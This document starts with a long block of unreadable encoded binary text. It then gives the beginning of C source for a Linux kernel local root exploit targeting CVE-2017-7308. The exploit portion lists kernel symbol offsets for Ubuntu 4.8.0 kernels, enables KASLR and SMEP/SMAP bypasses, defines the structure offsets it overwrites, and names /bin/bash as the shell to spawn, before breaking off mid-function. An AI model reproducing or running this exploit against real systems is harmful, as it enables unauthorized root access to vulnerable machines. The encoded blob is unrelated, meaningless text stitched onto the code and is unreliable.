zWUQ|oBEs9{qf0O~#Q3ERyi^ydzm#gdmv(bvw7fCeFFhE=JwQXpOa-Hi zsL49bB6nnowK*By-6wE%25x5eMPnt^-_+C8rfJo{mdL7{wEHmc*$JV!CMQG z=-)_b6W`+6@QOo4<)U#C|BngAj!`?+F}n$9oxuWq5C0D) zrl}XDO*X<8AWi`J68g9kjli|>v~x;#q#OF+a^!%D(=hgFdLg3p!#&H-wFqdi;RGqd z9RCpkC}N!{Yzu8so^HZ7j-DVc_Qg78`YhOtr9T2a_}+H9zi@b9l~M2Aqvf2ae7?eVB|;n>;Vwtur6IVjQ}Qu@qLC3zEY*W zRB57fHC6;fQ6O6klU}d?enhy6u(NPQerz8ydKg6UeH7P+|0GDl|8GoAm~dpDDuI9r zdKThM<6@hzoL9?`xObs1^cZMxR3b|=u{CYr?#7@(e%0iq* z7=g^aI{in(Q}SONy91@8t-SQ7csG{YicbG=jIiZ>q|i-eE^X0|=>ULQyn#|o2=5s4 z8kO8iC86|r2n6nI#gQ9EbE;-?qJ`+ApE8#v07%3kJNHtgqS8QTegS2<7s>it#=JiC zE{=D%ez34T#xFm?fB6teh3(oeP=)>i=R5f$d+Y@|0D<@zAcFwkPUXY1t@=W)N3SjM zm3Pn)cQdOyoas|N*0AOId+fq(Dkc)rNMt?Ts+#9}Iyg^R4Q&^HV&Fky8Qu{7|!?ikeRRVj3_{qzXTv-xyhZJ@QMEkczwR z9bdsur(*D9;<*#-Y@vgSK6Fi#3=U}5NGH3}^7Ksb1xr?R=@bCofrzv&7QPpfQbtMx zpOZ+;nEWLihD}f|Q>_wWYUP}fCa|dpw+1A`HYFo&^J;0sR*=ZqQ(KKU9|om@JK$5H zn@v1)lW6Ab?q#>6#z$YAVo)W``M<%7$O2NR@Yz#XXzX5m^suLoy?c@T{&ohnK2LwZ zuxoxue)rtmkNNn{KC$Ou{JB zAi5M=c{|F`%?5Dw9EA8bLws@TvYcZxL5BZNi*H)L|DTp$OiS?Pm@)c$6tVh9CuXdC zjBd<;aB_Ur{W=;q)`3Hvuz_#@ZJgkR)4*@~))&4Ox5O5|R%RzHLM8=__$qoJv`+B; z7(9L*n@b|}8BYBeW88yKSqg~NdTUs5)t4|jedV1vRZ!xF9?ivnmpl{GAs7rKVaq$1 z416ZsS1*RT0SP_7#H*U4OkN6AADjld!j?6FApqmHpPu?dba!^xlFhUI*o##x7iQT7 zBOu&z8n5WC>wX|697^>QoHLT_~+G5P}WLl6SP&VWq@Nx-22kBv)3*d4{B;>kle z^GMVQ+rb?a$s_JU{Bq1aqFyW%2f*vqvBDaK#5&_AOgv@9HNDvV! 
zlgVU~j3hJT%$Z!g5lnzg(^PG(m)5VvTCJ`6X{(LXo~%NOD#42iO|e?az~ znAS`v^L%EK{$FD#k<#Cuit$JAmA-wjwI8AB0p1iL6Ae{_Jtpnlqz1$nh7h)bS5>?c zYCqT&!x|kh3h`3N#DSi)g?2U)L$0va(!*HYyB(;U*Rj2^0A;`JVo`Q{gHxRL z4{V~1-V2eOAQGm|OC6VbaPK9Et>o)BWO0Zu0>}V?(wHDjkLQHxajGB`{5-9vfv=h)=uu%odxgMw$KhV_RirXfpMf!-U&TOI?~oYA0*|rXSzGn z_hPUq_Z+81zKNH0P1@wx^#K~XyvvxBY5Wu)J#RyFe%yqSTB%Ks+5_r+5h ze38s#k^dI%hXq|(SJP}~+lM_)`0;H`Lm%ufgO<&*Z6&?yNVkEfYoxW!Cq@`t#Dz0tM!kGL3M8$P#;P5zzg8|lx82oWrfliQmyXmm_@;PB1X zekC!gbMp5=K$+&CMe)gcTTFL$U9H2PlXxpzlmd!7O^kJ28!?_O_EC)J(tgL@rN^nY z@L9%kK%J+q6ahuY@z4ggZZy3R_pAsDaEWS68G;*11JcqO>O%sSMnyv(4`9Wcgv*6& zu$XWh4q@d$va;W?5X!!B9+~a1UEn@s^5TJ$9F;&LL zEbm~Ni?3U`#Y##5xwx;R_OlZUxUt$zmHy2c-8)-L~}$Vi2vd2yNVS4OXgl&lg0P(iNvdo25ASzDONk z_#~d>JoIPs-kRB)E;JPS9oP$(B7(in+}~1eg41clbX<2<;7dK2g;6Zf^frrPsQLM+ zSIL}6Z&FTU`)=<{FDcb&UU>;lX!Z+98s^}drD3{+&l!RPN*c)B2A0Ida*-3CA(7Qa zvn{-y2$mloWNU4$rH&)2-dHCUx?Svk*mNpBrr9}9Fd~CijQth^GQgO;LQ3t@>AqJtlHMw^j0wJ9iWfT0L(h}{X1a-~c;O{U!UplY(- zi=d)of$z{`girQrc#N#|J^|Z^OmS?kmOP_eyiCV4W+{HXzd*E;>bf~j`pvd21C7^v z6DSh7xRIn2j^{AM4m9XIdRaK}f>h0|;(O6I;pmW7Iu;x)Jf4CNnA>(|ICk}=(N&9`(b@KASm3rT9SAP#ys_VYbZ-iL2`qw>`GvMEUjcqSUc@=!wdQ}kHx0vNoC zzn`nBZ%aqfuxKc}2Rfn?vSVXGCY86Nb3(Q-YHaQAkq~!P^!HsM^MRWmL2P^?Z1GCb zlZhM#_@!N=bod7l3bNp3?C*_g8R=T1%h7dxf9%&#jcRPT9C<^fW@AuAa(|0eKzEQr z{xN(E_s&BgGL!OP;!)odv8HIU+>_Yi0a@?!qO-vb4!P~ftid~W+*%hXN^!y z0Fa_yGcCTUX7hh*ts@TNfn^Mz{$}@sAcpPyXgd=;mK1{=w(p><#e0vD1@y>OIO$I{ z=;5tSqWt>3*l9>(xvO21d0$_*$e5E z7VK`g=qS!Uj$r(ya-gIrSLRJKP!@dNw^#r(|2&%>q~279a4Ep6FQNs^5<6e56CA}0D+#>A&EFt&4aP*FoH zz-G8R@ZANMXR$15aQ$v7ERq)y@g3I+q`m_a0SwHTNK<;U0;6OE@sTms;P*%H$^PgJ zj3VeW#hob;Y+E9}ycrJ_*ZU>K$4;-NG2PZ|;e|N6)7-dLID2eRJ#uI<+02W82n>E6i7) zp9!@cecc&O@gy!-Hi&FjVA9)o=vb{#*{-rY;1=l zDrsY}c52YoR3J1c!~(3_B4?Zi^h(Cn&t%_)YuXETVtMDIbbaI@d*>3Y3ek{#EVdTr z0Er8QIHGv9qzex?Nmm?A8)lp>S{RD<`_Ok7sK?OGv_we<_JtNRp(Yu&xT~ZGUr;wC zXox4+z!^$D|0r~{Mj64oCq++*JV{%{&%=(a2>GxR>g>1hUl{2;n%0U<57JU2r}fR; z5d@_z9a~Xi_S*7MZwC@|c*4VWGyta^No9y_O8@~!(^8C!`Ad5AwH?pfB<_CssWD`kIGNBZ@|Kgd@KGKJ&3}G 
zD4CjY2H>PuRbDBJVg>GF$7$3-$)R<0RCZ!90FNk35gX5Xu;ONniam_s0(;RdM8i?W z`t!H|yRkwA0gl}OEs5z`SyXQKSQdRk__r&IKAe3JbdX2!fH86gb&h@@Pg5_%G^y)h zaSJzPolu{mBzS2C8RXE8$luBC0ht4-92V#H>=>P?^MWHe^d~R&b@)c!HZZW-A~q@bXCVA>M5jy$y6_WV)dFyq)B z4U&f4gf2obxode^2SI-Kk^A8?ZZ8SY0074xU!#>t1<*Dw7_mN$-H*zs?X@A$o+CT< zAy|$oPqq^OVCq31#qOXX1_jSV!6^lJ9l=JoP?gx~c7y}Zvkt}J5TCYPcSb+2fVtnb zxDg{7Rf@JX{pcw~$4D_Q*02eSB5%uWO?&4+cAoDC^J7k!rXZk|z4l2!^N;QnEsT+S z@=knZH63}XN$dydk>y9c5dZ9b(Hcj&l|t~L_b=*DL3?^>yWW=~ru05GX&E%v$g zpwcj7h0XEYcr=vgfsqVJH4;N#KPuL?c-JL5QjZoD0{IWIXi((9h{hA&?!#G(U=5zXi|rClSq0`5okv-(Bz#9K(10oNiz@=XdwpZNH+0@aPN1X;6El&cqCj znzI95UHbkcOb6-;^wt5~m~=f)k)yZLU%5KaO0h5+{98_KXnIS6=V;rcYw-S)Z8P8n zp#r;mwGe^YVEt}(KhwFXITk`qFedOmx@2)S-biL8xa5fbzJi>y^rBqo9Vi;+9i^2H zJZ*ABKNM1rwTB(!Q2=~bK(Cf`UI`0#Q?u}(MEl&cjAD}Y zlp*ZmOqEmbf8BtUO5xh!O&T=p^x-{54f}HwaF#sIK}8mnb=E=y3maHi!+&w+zDU-L zSWR-Kyy5U%-z+wl?8mfG>Xvm#8rvpd80aioiy~J#Qt*leT-ij6kW_`VtZ)3_JOrLJGLB2DZxu1SeZdy zSacyRngdUOgH`UtqZ!l>=?expY;s0FgC&Yb^p40>(EvkqXd~0Ur&aX(vM4;dV%w*^ zu|Fs!{p~xyjdFD@jgL6kv5hV}Gak$|M&Ql)Xa=MWd$N|Ub?hz8qSE6`yap#rQSVZC ztR$Hz)uG9I*N%|>(MXJATX92{5Q(c%VD zu0ns1jEwhSr6o2D{6i66%kS=6BXhdVcu3c)A;u!OK7?W-{dmdEg6s?3_+L`fytz{&!- zc9tVu3rNIB=PdXwCIhcKj(s6@?nKtP_N&D^B4QEki!DS9ZHztD<;LcCNVTrc5uF%2 zLP6y4P5NWQi+D$k1(H(b*Dj^8LZa8CNX^@EJQ$?|z)2BMU84VwsmaAi}vDFU==vvk z7NSQSr;%X&Zn`Z-WiY3^09o0d9J62-cCbkKs&5R@F|?0%8k64g90hMideMPoIdb=L z{ODJ-Je>b`IE}+MhhR_P(LEW)Y&h0yf4$@M$i!Y^*}w{^#IuZM`oM)8`4M@f*U@>J z^XUY`b|~&*1q~~FZ#s^>>6r3m*_K`8*klh_g}nlzD~}_RnZS5YWpK7Er}Xnj+oiz^ zdPi2|Q?BxK(+@b>PG3}X$7M$LtGlu#OGvVyO>g@A*v(f42(U-(#} zzo@9lgZTduetSh5*xJcoD#RfI529bomp4y5%JGUjY<=HPc#@l#FimLTFuikSS@g7M za~YY*(G$<7LIdykF{+9;9rL>%Ti}GnKnuq54M@~9_BT{=3{3$ew){_A z_V{bjy@;^Lmi{>{&YkZ0UG~0!t2_@E0Nz&bn)-&j+cyknH$Da;?ovG?G&LImw~ zL>F%+YV<+)m&Ci@YdS~Q19(nDGeCXIhq15qIu3m(p2#{1{vc-h4qMT?;(;wazpN0v zq?P<brg#(@Z5>#z_>&*2OOJw=@K4#8%H<_ zPT00xM}mZfxJ*Hf2Sk!^-(bSy_+kNsqFNZ}!Q{@-PtHMAy5_+H^B&ulxs*)w3e;l$ zj|q?N>#YYQ`*o}}q!teGdhzN6j+;`7$4gGO_H;0|?ZhVA*3YSBAqnJx@GD60sA&LD 
zujoE;8bOPDXU%NI5?kBxP4a;RJX{LY0f0CZgm-ckTLeRNMZZj*-|zC=vPnB^^ssg;CqK zzqRAil)ehY#+(ze(YQ?)az^7sM*SV7X<~7{!xsIFQhR?1#afX?S-#fjxrv8H#cmN77zIY&6ij z)15_l&uve5oFf+tv+Qm&^t!tHYd1%H!< zH&WD*}tbpC*$ zhrFIZt>1T@w_2MW3Dy`pTDUeywGhr@b} z+gA_vCDk81F}w|Woja`8dqH8;x&8XIYMmI2`#?zd1VUcQ42_pWoJ@jH*&z9|{o&bu zuc3KEA;hFMAr1@~=s`V2qj(KJDvPSr1VS5ga<$oB!!tWv=dKPkiA+6pUe89N^wsE1 zUcHtiArLSmmjex6qmBZbynaJ(3I%YvI7eGQ{c1^=muKi3TpI*&#E(=%-khSc70XLp z%S*1jqJo;Y+UsxO@`t_kHM7wJYeRuZP!_5w2m+X}%gyz+dC5 z)$0R#1YLpjhiLDdp~8_GwJ`}KI69d3gS(@){-&$->VV%nBhiuT1A&cU@H|jGIATS4 z$x7V~xvwaD$tzZVa}Ue;8yAatwy!g>(F=&n>B!N>Ci7gc9Y z)XIp2L_ag?(31mDDtu5pnP774a9to$U#(Ypi4;0R_A+m?*Ao#f03L}BhTL1~1MX^l zT2QhWt&*3$@%ZoYdk?=}{EqO?jxhRd!jFoY8Xw+Tt?60@ zR^W%@#Y*}YkEh@t9du6qN7%@?4vIA3!{TS-5nnoiaSxVrJz9+3oI@xMoK-5~UgSnO z@-a+Z&{BxghAgN`2PmVb#9Ko=oQEobjmagb50P!bB8!675OCp4*{C%29 z9`DDGuGMb>t}n*VgZ-gEH z#MXhl6;4=k8GZ@68J{w9Yf2*t&?q}#D{E&hy_r?-TuI;y{BNlL28WYpcBBNIi|F zG|hoU5r#QSHjB0#h+8*|7Hy?B)Zhz?SrbfFAMAn^L2n4=1#~CH!wswyOrsD-4@W$8 zI$5nc?C@$IrcOp6)RG8c>t0(%6y9cE*a&ND-1QN!ZUh2)y*pIvC39S_b{ojNB}nDa zrA=1vtub_D2@UQ;EmlNuSEDz08z_BLBM=FByn0n6+@d-C25J`xqD*S)Kvw?%6=oj6 zK*$~P)wk%FOEzM5A}a0lH@fS6h~)Kd)QUoZaCoN7PREpCBjUTOX9oO;Bx)#4TCG^s zQg8z)gJ(qnzaLd6770dAstqQx<9(kfaS zssi;sk6<#U41u7K53;ofh*m>B8r=RCF}V}jipp~vpr)cps=Z-P$QOjnp{$8!T?%8; z6ijmEsq?`eRU%15iakO+6B4N<@+K(=Q&eJKat;aktA>aO-ZlwiH{kI^LRy94MhBFA z%oBjADw=R*2$CF#gmtvBmpaR!p5<|)uhN`(S;Q{|iQ@Yjg7seFrED$CSHf;|8FU2H zoZ3)!8Yeoc;j8f>*$_HNBdCi-w-JSKW3B~BYM_dUjyAw4rXtxS$>dHZ$-^YdqL+oW zGB85S-K)G1yRa8^LLMta0VCiE)N}h2N4bQu!w<9$$!!&aG3hguuA${8OyP^YVN3_4 zdg1mMkkE3j@Ic!n@|1IM(iuX7aB7KQ;@&_#2f^V;5ZZuPS|N%ccqlkE5JG)n;4Trp z#@#?Vgc2VJRef`)K%oejO`0McT(;$2qX{b#iSDoNle_;=`UUGB6faqwxT|En(9l(p zni`0M)TINA;2J~KV8%`=Yk&(>ssXUb?H9H5VoL3#1Lv~U{r9|(}GwF zHF7W%s1+J#AT$|8&%i(+`X<(Ysxj`Yg1n-$3@EY7BLR#B-e!;2OLJ0G1$xsLX+SGu zSxdW8EWI$KMhv+OL~C@Uj-Z95Jz)O3ddk!@MyI5vjlFErsH|b9Odfak`E~w4@Y*Up zeYkD>gj3JVJS`(9`}Bz;Mvgh_oN4E_-F)MD7ffHY_>v_>rI(hky=vY1Z(Y5?Rq6Ir 
zduwWa*KDj0g^iZ$uD>CX4XrEEqE{>pX4?6hwtZ`gR=Curwcc@;roI0K+oX!TANC9# z2l*W1a}S^Ui`2a1#3o6}e_Pq^!EHA}TI2Z9d9jv~IxHh?xGA53xGKGW`-}wBhNTbB z$Q;2@MxHWi^cY*#*m2<2X{S#-*TpSnRn2uuxA2a#DLa8`r^8x-}FB9$I)~bXQh@;iqejyGppRk_LjY!>C zF6c%hb`Qr7kDa>lh_M^ScsJy$8}pTJOdh&16Y0kEqZ_k>ZcGWfVe5Cp!0*O9qZ>wd zH>~Myn9$v@$Gb7n>BbDF8`gdIS@=!DZ!&&Z(da%0Ka}Hf$kcA+zZ?1QM*h2zKY5AU zjr?~b|J}%cH}c<&{C6Y&-N^qC^52d8cVjy9n-pyn;*Uc7QHVe4ZK|6x{!^}7rKL1y zrJOY?BlA{dl#MWyL2JD@9v9P@FgU5w&cu(7tGC`O7V%N7{6y1V@-zu z`1+65;K@YnEUlKPddVMEK8u{}$m_4GLeK2!9dy z34~udD7+*Q{%7Dhh4J`>$>GTWiZ$bFJ|kRoU(8r9+mNKz6jx^$?;Q{Ch~s+;U0uvHmH8f67~BW;orS19>04~ z`0a`C3Bxokqa5q9;8UXhl-K{qhZ@gR70maQujwMF@^yJOFX1E>gTNa)pj*XJ^_V;} ztgR)U;!p$pcD{$67Dtfp$qu0dx?3D-0Sx1SIK)Z|U(*RqCXa)DuB;A*B`f=liRRo zxXhrH+rtzsar^FoT_=fQJz9GE- z8^VDj zmnp0IXTG6Jz$E7?f9|I0md@hwM>6m~d0kpmbg`aOy8Mb<{i0cOX65}mX{TYeR_U)~ z`ZO%4E4?)sPt%ls8;lRrlwKN)gZo49Crul!WetgEX!?+NrdBv4K0;IacyPWWwW0Jv z8XhYI_a{@zYuLw{SuasY8nk|$S+5CvjMh9PZqtU+XK8pquCDwlyA3)?4jT1xRG%vt>;Uqpx75K?~AOTAOKOZyk zvj})94LNE6#62A)_z_-c!q+l>s|ly&f)qTVQT0{*=|;xum=9_k>{RKiffDz0+=(Bh z)5`R!V_5Nl)FSbr($v1BhN-^WU%^Gv@f@zHUOEvZ9S@)!L-F}G&=CDCx+GThnha4O z{8q-#mBHE@I1iQ1TfkHBY_0n#NhqFW;WB1H|Ct5;HE>D?ds~U)?_8h^oQKL+mEVhr zDjll)XW@d%Ut_|5gb69({pUz}U7ob57U`4Yq@nU%3;7rdzr=#R!~(Cdz}*)3MhiS_ zf!}C>Z?nL^Z-M{F0$2RsNF5Ug$i(qe3wqj&Xehq@$^xf3(opm-Ti}N+@b@inRsKWS zvfLmON6do$GYkA{3w$^XkDjXVnF(&+oXSHh;+tl z`xsZl)dGujiY@R}7I>uvuJ}3m0$DG`Pv5_wr}7^(l|N)bzuf}=Zwvf73w$M14CQ;+ zly58O3GXrC_gbX$Hw!%wwV+=zj?y2eDLa|;BOTx4d}F43@A#&4c)n;(M`L?1lN9<B+98<8k2BURiJH;$GPg&oZ8A!uK$)neZP1 zAF3T+1y1=MY!k_A|Hb;}kDN{+r;`P_q~jfdkJR*i@}AYS_7_g))~ym(>3quR=%(_V zV0@wp&k$4hljo18Tj1Fic%B7bV1X~Sz~R7hNWQJMz&BXnN**G2Oa5^4YPH`$KjMdj z>4O&Z*8wLvS=pnD2w<-`zH32$mj!;W1^y^-l9PLWB-0h%5^(un7WA)L;2&DxDUh$B zRwSt9JjzeUfib%i_4pg8t_g_>&g+9t-?U3;Y8M z{1XfO3k&>&1)ga!u8p<8X;-wN+WlM$e5M7y%mTmP0$*i;ud~4GfK&fk%l%8~;cFRR zZR&Te7U^_a;6Jdye{6w20-X9|)}vCMma|;#08ZtsG?kMc-Vep+0~R^6X)J@%i$8HV1EH{J<0mbTA%a{A||$ z;+ZVMu4nv7o)={^{auXThIu3%OS$~N0zNi%q_%yZ#D6DG+S5$Gk?mF7ildw8!3hV? 
z9~FLp>4#00bhHjd$N2G*Z~JD-`+Ma{`-4bljMmEQlPaBeIGrx$+ZjyX$N1I!z;Per z{{&9$<>vVgPw%v`xS;l`<#oI$muE8JXqUn%GJ$EF&UB{#G*<%5KJ6mLmsd($J>M*3 zTs=?W>6z9)R+eWZkF%;BS1^73RGAKUGi?pyw{iI~oQb27@n@KCY<_ADj6cccpUCui z7zn7ox2}=E39fGh^u(W=Iei<`Z=-a;hp&DrffB}V2R=3x>&!j6K)_yc+{5{P{h#t) z@!>wkJGi}6`5$3?W{#v+<$Q*5^&IXU8LYj;xR>jN;XoXJVEkiV04QSoV#qPocLMY0 z7RLX~^uOW-fF9<<*T9Jn*O>S)1`SQ=?7UwlP|E2{Wc+S!s2awn0H<`!{c$GK|9~0O z!t{$7|0nAQhP7f&$GrZzoayi5dMWw83i#Mm^t(g4NLA0?j$fRj9L z@6knsAgBL(rmwtR0uILCWBiMsNI+-2A03d=e}L=7Y|>)j8_9z?-#$*qEN@2`AGb;- z%wnhglkq!DdLRS(j`CgeV@dxL=G$qEw=g}#TO4NtCpj@cciV#UQ#sG&@{3^b$^*-5j9&(P$`E$KTBaX!nj~~FeKq5k^LoM!j0b>IInDLD znd#MYYfetPh4GgzkO`2#c{=W3eBnd#{#<#|4vm)O%si|MMCrFjnZB6i@DZkef$`Rd zB~Z)hA0!;|`2g$B)lC03)B7J{fKMMV{%o!U<}m&`$}<*xGneNRrf+2VznM3)6FQS`OoP@&K|=CZ}D@cu9@~F#L(5 z3^=u;dA;aLrmyCOUZroVnBKgeb^+QWi{4676Hrb+!0DLBwMNE=Jthg2JYUcFLDs{p zUNu_Rq5fs=7k4o}al1?h-BTQoFusPzah3k#z^T6NJPxYjzQFh`x{S}_qrDEC^mY#G zZ6$|yp&cn5v)sPR`HqLY(4orzG2=gfNaEAwNju8;b{3q!s0K#-EXb{SJQ@w0%2Q}6 z&z0jPf8H?ZJt_zBEzaYkO8)l{04o2uN?DLaT%I>TPx`?u=i@m2Ei)wHElfX?({Esb zRpaRb;FSI%mfQJEPyTMHJh$?~A)C?Ka>g&(E(y7NYxRtu#fm}chie%(+yB=w9$>pY z%K6^Rco8R1%lK8WKd78n-z@=U|J=s(zq?Q3zhL?wGyXQGqskxSbQ(FG?=$@`Ku_tL z$BXAUogU@`?HWnPON<}F0bO#F>tJ8lqwT?obgm1A6Ibt&oZ9Hg0qnE7didsOC_+E2Y?mhWWGDMOZ-}v zhu?ELZ)8h+t2}9MaXRMrA0FX;eS5AX z2JkGjyV>4uW%}9cnUGIS;4{_h78Y1Lx8pXZ-|(m;RPA*;aH_BQ{ek`^)A=XkvpE447cCR=MCn}1{YZ^3r?NgY zKS!HF^r+WEY*&bP$dShk#y{k7M6Hut#CZQzvLJK0JeL5cad5#wT_8&Dod?0o!rRH_ z_w-gWeIC;*wRk0`Z`S{A#tQ>7Ll;-LL8LSAKAy_g08Z^?w)d{*bpFbG>)`U=%=q`X zU#RxFo$--8jxf3QL&oA7MlQCJlnDaOk=0i|#E zG2X*^3C$;tLyV8Bl=q9|NqYtIPJAxpj>5x_)&qKBf4-&*N+th)<8;jHX~!5pg!Z9> z-uI$o4C~>ICOvZ+aN>_y4`0CaZth2F9L#5W^ZJsV=|ALtJ5y$>l{3C`y9CrY`#Y}h z>#QfanYA@cU&j?a%IRFgc$O{!rO$6*ypZjaFwxSsLH81H6#QuT|c7&qJD&oVwfM<&3-q4=nf_;0pL4>0{fll;8P z_+KB9=}h4E{SY{<=VZOFivU%xvsiD;Wc%2rO5$oQ9xpSoQFX^fABJdu3< zx-XtAoGH%ub*}%z8HuHHN)34bsqH8PVNxPWwmE2Gtaz9wY_?NkoQ1R_D#*H6I z9Jk`AVEp1!;$P+U1;ouObuz?S_ap`gutzNOpRpzW%?Q-F+c+g#m 
z!?g@v65&Izq|~__1l9O3zZTvWydjs-;PTYNcUl;+sspat`aqSt-UUaDp|HyxY1ZIv z49*4c0r;%>^XJahD8S{bZl=5WT1^Pv7+lqnhK3d`P<0JH6bC+UzA8@1@?udMnYp?f z$c4Os$XukyMwhDwZVgE>`a%>6Xi*u?b{BT6P;aPL$7A!y>^}Z^P zOE`#wdpn;W;i4q@2*Rh{{(uWE7sPko2!XpnICjDXMZ$^Fg!2zq$V(txh6Ujn@QsIyCb!QB`Y1)^QV*9^Zi939e?;%oz)j%G?RGXTb`bfBrF35Ev&VibG z`PT)PaMf@Y2{{S@ffoU~fo}-hG}Z*+XwsnO3I>8MxcSg(8Vpy27zSM2)C9HWYG17n zeqJQ8i`+UQ4fuTsBL%dLXzwrt#OtD1NXF&Y8pHlX;$gpZV~1EFBR~Zc7tI=+zu-Ua z;rO7*-Qtq>6bfmOWS%-IHX(H(xXj|~25LJ3gF@P=1B}pC; z+v5o$kXj5>L8Fdb9=O15=B+|dO+)(f02vqq4~p^vE*M4fUVozxJ`BV)c~Nv3^+FKA zA)f~vk%&fePeEt`Up?3>u2BWy>Hv{(_Epp0hH$OsDrpwQ68;|$SOb502C*8~bn-R_ zp&2{^)`IzY=x7(_FMz`_MI?Oyh3imY>O)|H#|XKFjMtN2$_5CdaJ>qy2%jX3!0Rhy zHGe_gMH(ER(8YWWU4SkwBmoY1Ts2MAs7yU|9T&1;6uwY2@;)fJJ$LT>0ugWS+za!N zdri<&kACf|X`vRRJZt?`K7(#NfnW>W(sfM;6%%cY9$&?k#RWmW0KBc@+~BTm^a-JF zfNK=di5sZzP@6VXLB5)(!r%n_#X>y_L7g=>Z^3+ohN(3W+5~mhP=$+NAna>)!KX$O zWhVT|Bx7#F2)W?�UjQ&XTA_2&ZO-(Nk;c-L)hHLj<9&a5v$G(#}2$7MqRiE(C9(#aQxAR|9D5RfKugFf#I(C{HRhXxS$B=SkYMRM1S1C3xkd#+2f3ie0HN@*AJYZ*-Jt5ILGH4u!-0LW zzsaWakn6laxZdlf7A6Ntb8v>7z}*NbH$tnRh4TyM%oAE2bpt7G=O?59BuyBCWt)@3 z%0^jq$pyHvqP7ss5e{4B;3O|yE>diQO_Vq2T*X%{x0gGMs3jl)P@5sBE_9N?fEeun z2?dZuQ(CrSslCj#V%f3^_-I~jUs_f|WAgIiz7h^hRK!o>Vgm9~jw_hdHXL(261n z%8Q2&my1Si3dR5p_s|F@8H@NyX{qsEL;}H}TqOy04FuOUd60?}1Ke^ga0Nd%ViZG% zBO6OfhmdAsh%!46lBCW~;w35tkIy1Hm10maxZ5C53Kd0`mI=H#n;J!QnqUiP8ymzZ zg)6G9sH@Ahy1d9G%{1vgmI};_V4G4IaY_#;?MNA6>|&z@!wC7%cCr6eQEzS*PtZlJ z1gFx_oA8#6OWAI6@W@NnZn9C}qAfA*OC%zjDM=4Db3i@Ps}2WT>^4ZMWMJt2E*^~C z=y+^vQ2c7QfX)8LM{ z&tfEO@c~l}fn-bIq{JwM8yd#}al^a(@PQO&!6LPzi2+{t8+VcCai|e;Ek>$@#6j{V zL_7f^x(-pE4mWgkBi=97D(B&WCslteZWn*%TLKjJ0qb^AT?wbA)qQuT?{p& zDj+35QV9qNMnp{7RM#5B@{Lll30^00TK0OLY*G2i;K5l=R9)nLSlT7Ps_VmZ2Xlq`*cnuEZ38 zrUVcOn&Sx*2&0MY063A0cL&@!UegU*rSACsk9j&-U(YoN`%>LcQ8HbQ zO5lT-hzN3a>MqPHG(OoayjUS)K?FqIX+(gElQSO#ac7hBYKkhA4vZXp&nSzhwHE=f`|ii2%%`}LQ?%AgcTQ7D}>@A=1MML$b}uqCN&5L zECe~@JV{ma94fKmKyeIV_~T0HQ4BTE{bJTb{1D3^#B`wsc=9IfOlgvd?hZ-UW?|P0 znuyM#Mi%Efb%ot2>abvV%Qx*n?(-%wOM46 
zYnHdpCDzWgSz-+gsbByL;{@rWlt3s_h9gOjM#)feGFY1hRfKrh1%SM#{@)+;{EnVI z@MF%z^M3W*Up*I6;cA^$Js+EbxU_Vs!j+#6bORy@wdLBf}q!gy&Z|8Md zb;jeCK?esXuzXxmSyX)G_d}hPKOz-w&VM1|Qkui@6Njo8pZT$k3Kg`88(iFqUvhlq zMb9T6kq3j)miaLC8Nr(?&-O5a{lUhj5<$!SW(Ke%2%N)P4U%pQFS)w zM|mY5Yj8uD;;-^^qRtsy#TKxjc0oU#sTgqR>SN>J%{>}J}rufPaOY^@OzYXz8_Ei4LUrPtaFJy+Ra8-U)FM7O@Tz=)( zW#6j^z_CD{5`R^Eb^Z=QlH+R!bxC_ro=nY`=)Wrd4@~jZ`>Hy}&rt=J$!R*D)rlU5 zP+E$t@{lfq9EZe7+hOW}GE|1q-|hHO`Sb8gK2&@>UL14~EgkAi;VN$tz<<*D1=L?8 wgSb}l6ioL@_7z6wN-lrlY>Cq2^iT0qd{cZK0c@!Jx2MXSym$_je3 +// --- +// Updated by +// - support for systems with SMEP but no SMAP +// - check number of CPU cores +// - additional kernel targets +// - additional KASLR bypasses +// https://github.com/bcoles/kernel-exploits/tree/cve-2017-7308 + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include + +#define DEBUG + +#ifdef DEBUG +# define dprintf printf +#else +# define dprintf +#endif + +#define ENABLE_KASLR_BYPASS 1 +#define ENABLE_SMEP_SMAP_BYPASS 1 + +char *SHELL = "/bin/bash"; + +// Will be overwritten if ENABLE_KASLR_BYPASS +unsigned long KERNEL_BASE = 0xffffffff81000000ul; + +// Will be overwritten by detect_versions(). +int kernel = -1; + +struct kernel_info { + const char* version; + uint64_t commit_creds; + uint64_t prepare_kernel_cred; + uint64_t native_write_cr4; +}; + +struct kernel_info kernels[] = { + { "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x64210 }, + { "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x64210 }, + { "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x64210 }, + { "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x64210 }, + { "4.8.0-42-generic", 0xa5cf0, 0xa60e0, 0x64210 }, + { "4.8.0-44-generic", 0xa5cf0, 0xa60e0, 0x64210 }, + { "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x64210 }, +}; + +// Used to get root privileges. 
+#define COMMIT_CREDS (KERNEL_BASE + kernels[kernel].commit_creds) +#define PREPARE_KERNEL_CRED (KERNEL_BASE + kernels[kernel].prepare_kernel_cred) +#define NATIVE_WRITE_CR4 (KERNEL_BASE + kernels[kernel].native_write_cr4) + +// Will be overwritten if ENABLE_SMEP_SMAP_BYPASS +unsigned long CR4_DESIRED_VALUE = 0x406e0ul; + +#define KMALLOC_PAD 512 +#define PAGEALLOC_PAD 1024 + +// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * + +typedef uint32_t u32; + +// $ pahole -C hlist_node ./vmlinux +struct hlist_node { + struct hlist_node * next; /* 0 8 */ + struct hlist_node * * pprev; /* 8 8 */ +}; + +// $ pahole -C timer_list ./vmlinux +struct timer_list { + struct hlist_node entry; /* 0 16 */ + long unsigned int expires; /* 16 8 */ + void (*function)(long unsigned int); /* 24 8 */ + long unsigned int data; /* 32 8 */ + u32 flags; /* 40 4 */ + int start_pid; /* 44 4 */ + void * start_site; /* 48 8 */ + char start_comm[16]; /* 56 16 */ +}; + +// packet_sock->rx_ring->prb_bdqc->retire_blk_timer +#define TIMER_OFFSET 896 + +// pakcet_sock->xmit +#define XMIT_OFFSET 1304 + +// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * * + +void packet_socket_rx_ring_init(int s, unsigned int block_size, + unsigned int frame_size, unsigned int block_nr, + unsigned int 